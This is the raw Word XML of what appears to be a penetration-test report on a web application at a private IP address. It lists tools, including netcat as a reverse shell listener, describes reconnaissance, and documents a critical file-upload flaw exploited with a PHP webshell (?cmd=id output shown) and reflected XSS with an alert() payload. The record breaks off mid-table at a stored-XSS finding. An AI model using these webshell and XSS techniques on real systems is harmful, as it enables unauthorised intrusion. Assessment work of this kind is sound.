      <w:tr w:rsidR="006B1D16" w:rsidRPr="006B1D16" w14:paraId="56EC6B5B" w14:textId="77777777" w:rsidTr="006B1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07B0852" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AFAE9EA" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Automated SQL injection exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B1D16" w:rsidRPr="006B1D16" w14:paraId="6E15EE3E" w14:textId="77777777" w:rsidTr="006B1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6DF73FD" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:r w:rsidRPr="006B1D16">
              <w:t>curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05717EB1" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Manual payload delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B1D16" w14:paraId="4DB2630A" w14:textId="77777777" w:rsidTr="006B1D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A61A53A" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t xml:space="preserve"> (nc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0C80B4" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Reverse shell listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46080B55" w14:textId="06BD8CD2" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16"/>
    <w:p w14:paraId="0C1FE8AD" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>3.2 Reconnaissance &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171AF6CF" w14:textId="3F2DF74F" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>Step 1 — Nmap Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7154F72C" w14:textId="0202CC4A" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r w:rsidRPr="006B1D16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4063E71C" wp14:editId="4C156A1F">
            <wp:extent cx="4057519" cy="1290056"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="192016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691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7278" cy="129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BE22" w14:textId="1B55878C" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r w:rsidRPr="006B1D16">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 2 — Directory Enumeration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D16">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C7CED13" w14:textId="69F4E4FF" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r w:rsidRPr="006B1D16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7301E85F" wp14:editId="2B3C6745">
            <wp:extent cx="4077053" cy="3558848"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="151505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588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0C45" w14:textId="55DB7D38" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r w:rsidRPr="006B1D16">
        <w:t>findings: /profile, /search, /feedback, /admin/tools, /directory, /login, /static/uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A244013" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16"/>
    <w:p w14:paraId="51302126" w14:textId="503763AD" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r w:rsidRPr="006B1D16">
        <w:t xml:space="preserve">Step 3 — Automated Web Scan with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D16">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="771AD043" w14:textId="11A14475" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r w:rsidRPr="006B1D16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72CC052E" wp14:editId="4C57BB1A">
            <wp:extent cx="5943600" cy="2398395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="175805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555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BE24" w14:textId="67A0D6B5" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D16">
        <w:t>Nikto's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D16">
        <w:t xml:space="preserve"> output showing missing security headers, allowed methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32659486" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16"/>
    <w:p w14:paraId="51B614EC" w14:textId="056343FB" w:rsidR="006B1D16" w:rsidRDefault="0055697C" w:rsidP="006B1D16">
      <w:r w:rsidRPr="0055697C">
        <w:lastRenderedPageBreak/>
        <w:t>Step 4 — Manual Browsing with Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488B201" w14:textId="7F2F0F5F" w:rsidR="0055697C" w:rsidRDefault="0055697C" w:rsidP="006B1D16">
      <w:r w:rsidRPr="0055697C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6D9CE8" wp14:editId="28106BE8">
            <wp:extent cx="5943600" cy="1773555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161782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281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84B7" w14:textId="77777777" w:rsidR="0055697C" w:rsidRDefault="0055697C" w:rsidP="006B1D16"/>
    <w:p w14:paraId="0AA75387" w14:textId="77777777" w:rsidR="0055697C" w:rsidRPr="00724BA4" w:rsidRDefault="0055697C" w:rsidP="0055697C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.3 Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D4DB5" w14:textId="503C0748" w:rsidR="0055697C" w:rsidRPr="00724BA4" w:rsidRDefault="0055697C" w:rsidP="0055697C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3.1 Vulnerability 1 — File Upload (Critical)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B7B52" w:rsidRPr="002B7B52" w14:paraId="6439FAA3" w14:textId="77777777" w:rsidTr="00B72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425FD56" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A2F">
            <w:r w:rsidRPr="002B7B52">
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="107499B9" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A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7B52">
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7B52" w:rsidRPr="002B7B52" w14:paraId="7DD788F4" w14:textId="77777777" w:rsidTr="00B72A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F513468" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A2F">
            <w:r w:rsidRPr="002B7B52">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0954308F" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A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7B52">
              <w:t>POST /profile — Profile Avatar Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7B52" w:rsidRPr="002B7B52" w14:paraId="392AB3B0" w14:textId="77777777" w:rsidTr="00B72A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0AE02E2" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A2F">
            <w:r w:rsidRPr="002B7B52">
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EB176E3" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A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7B52">
              <w:t>avatar (multipart/form-data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7B52" w:rsidRPr="002B7B52" w14:paraId="3821D1CE" w14:textId="77777777" w:rsidTr="00B72A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63C3CE2" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A2F">
            <w:r w:rsidRPr="002B7B52">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FF86AB1" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A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7B52">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7B52" w14:paraId="2C327A1A" w14:textId="77777777" w:rsidTr="00B72A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47AACF2" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRPr="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A2F">
            <w:r w:rsidRPr="002B7B52">
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714982F9" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="00B72A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7B52">
              <w:t>CWE-434: Unrestricted Upload of File with Dangerous Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A0629FB" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="0055697C"/>
    <w:p w14:paraId="25150053" w14:textId="5E368446" w:rsidR="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="0055697C">
      <w:r w:rsidRPr="002B7B52">
        <w:t xml:space="preserve">The /profile endpoint accepts any file type for avatar uploads with no server-side extension or MIME type validation. An attacker can upload a PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B7B52">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B7B52">
        <w:t xml:space="preserve"> disguised as a profile picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD0C12" w14:textId="6E3C53D7" w:rsidR="0055697C" w:rsidRDefault="002B7B52" w:rsidP="002B7B52">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7B52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6957AB" wp14:editId="727822BA">
            <wp:extent cx="3442138" cy="2533796"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="21576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646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51731" cy="254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F692" w14:textId="484C4422" w:rsidR="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="002B7B52">
      <w:r w:rsidRPr="002B7B52">
        <w:lastRenderedPageBreak/>
        <w:t>HTTP Response</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5439E1" w14:textId="1CBF5373" w:rsidR="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="002B7B52">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7B52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E83ED6" wp14:editId="72163D70">
            <wp:extent cx="4782207" cy="3178941"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="61591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118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87209" cy="318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35BF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E069391" w14:textId="6F975C5D" w:rsidR="009E35BF" w:rsidRPr="009E35BF" w:rsidRDefault="009E35BF" w:rsidP="009E35BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E35BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proof of Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57EC87" w14:textId="77777777" w:rsidR="009E35BF" w:rsidRDefault="009E35BF" w:rsidP="009E35BF">
      <w:r>
        <w:t>File accessible at: http://192.168.100.205:5000/static/uploads/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3119E27E" w14:textId="77777777" w:rsidR="009E35BF" w:rsidRDefault="009E35BF" w:rsidP="009E35BF">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Executing ?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">=id returns: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1000(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) gid=1000(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE09CF5" w14:textId="266847DB" w:rsidR="009E35BF" w:rsidRDefault="009E35BF" w:rsidP="009E35BF">
      <w:r>
        <w:t>This leads directly to Remote Code Execution (RCE) - covered in section 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507A50A9" w14:textId="4924F92E" w:rsidR="009E35BF" w:rsidRDefault="009E35BF" w:rsidP="002B7B52">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009E35BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A783859" wp14:editId="45AA30B7">
            <wp:extent cx="6156613" cy="295991"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="128841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159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68069" cy="30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9E0F" w14:textId="77777777" w:rsidR="002B7B52" w:rsidRDefault="002B7B52" w:rsidP="0055697C"/>
    <w:p w14:paraId="65CB5546" w14:textId="054E79C7" w:rsidR="00652F2E" w:rsidRPr="00724BA4" w:rsidRDefault="00652F2E" w:rsidP="0055697C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3.2 Vulnerability 2 - XSS Reflected &amp; Stored (High)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2117"/>
        <w:gridCol w:w="7233"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="2D93247D" w14:textId="77777777" w:rsidTr="00AD6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42A819B" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBB17F7" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F102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6B80">
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="42B1701D" w14:textId="77777777" w:rsidTr="00AD6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0EBAD60" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C66E6CE" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>GET /search — Knowledge Base Search Bar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="75A6B845" w14:textId="77777777" w:rsidTr="00AD6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C26D08B" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681B2D53" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>q (URL query string)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="39CD93E4" w14:textId="77777777" w:rsidTr="00AD6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7F81738" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239F8567" w14:textId="6758F020" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="3BC42DA8" w14:textId="77777777" w:rsidTr="00AD6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EAF52A5" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47023BFD" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="3CA2EBA3" w14:textId="77777777" w:rsidTr="00AD6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0184A37" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EE4050E" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="0907AC97" w14:textId="77777777" w:rsidTr="00AD6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136A84D" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E374E1" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>Attacker crafts a malicious URL that executes JavaScript in the victim's browser, enabling session hijacking or credential theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="1665CF29" w14:textId="77777777" w:rsidTr="00AD6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674CFF6" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:t>Trigger Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5ABF32" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>&lt;script&gt;alert('XSS</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AD6B80">
              <w:t>')&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AD6B80">
              <w:t>/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w14:paraId="6545F129" w14:textId="77777777" w:rsidTr="00AD6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AC9243F" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10232">
            <w:r w:rsidRPr="00AD6B80">
              <w:lastRenderedPageBreak/>
              <w:t>Evidence URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7180623F" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRPr="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00F10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B80">
              <w:t>http://192.168.100.205:5000/search?q=&lt;script&gt;alert('XSS</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AD6B80">
              <w:t>')&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AD6B80">
              <w:t>/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="319CB506" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="002B7B52"/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1284"/>
        <w:gridCol w:w="8066"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="4AA8A8DF" w14:textId="77777777" w:rsidTr="009B73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0923933" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A936D0" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="7DC8C369" w14:textId="77777777" w:rsidTr="009B73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3634EA6" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53CD15C3" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>POST /feedback — Employee Community Feedback Board</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="0C7C7895" w14:textId="77777777" w:rsidTr="009B73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9FD90BA" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FA5F388" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>comment, name (form-data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="7ED594AC" w14:textId="77777777" w:rsidTr="009B73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E2AAD3E" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6644F771" w14:textId="272FB5A2" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
